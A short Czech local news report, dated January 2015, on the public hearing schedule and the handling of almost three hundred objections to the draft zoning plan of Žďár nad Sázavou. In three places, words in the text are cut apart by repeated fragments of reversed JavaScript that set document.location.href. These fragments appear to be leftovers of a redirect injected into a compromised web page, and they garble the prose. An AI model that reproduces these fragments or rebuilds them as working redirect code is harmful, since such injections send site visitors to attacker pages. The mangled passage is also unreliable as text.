územní plán
Rainbow page separator

K projednání návrhu územního plánu Žďáru má dojít v létě

Čtvrtek, 15. ledna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Téměř tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky námitek, návrhů a připomínek bylo především obyvateli Žďáru podáno k návrhu koncepce územního plánu města. Jeho druhé veřejné projednávání se v Domě kultury uskutečnilo loni v říjnu.
Městský úřad nyní všechna ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to podání zpracovává a projedná s orgány státní správy, načež budou pravděpodobně v květnu projednána žďárskými radními a zastupiteli. Na základě návrhu rozhodnutí o námitkách pak dojde k úpravě návrhu územního plánu projektantem, aby mohlo být svoláno jeho veřejné projednání, k němuž by výhledově mělo dojít v červenci.
Návrh rozhodnutí o námitkách a připomínkách bude rovněž zveřejněn na webu města, takže každý, kdo v souvislosti s návrhem územního plánu nějakou učinil, si bude moci sám dohledat, jak o ní bylo rozhodnu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Případně se může přijít informovat přímo k úředníkům odboru rozvoje a plánování žďárské radnice.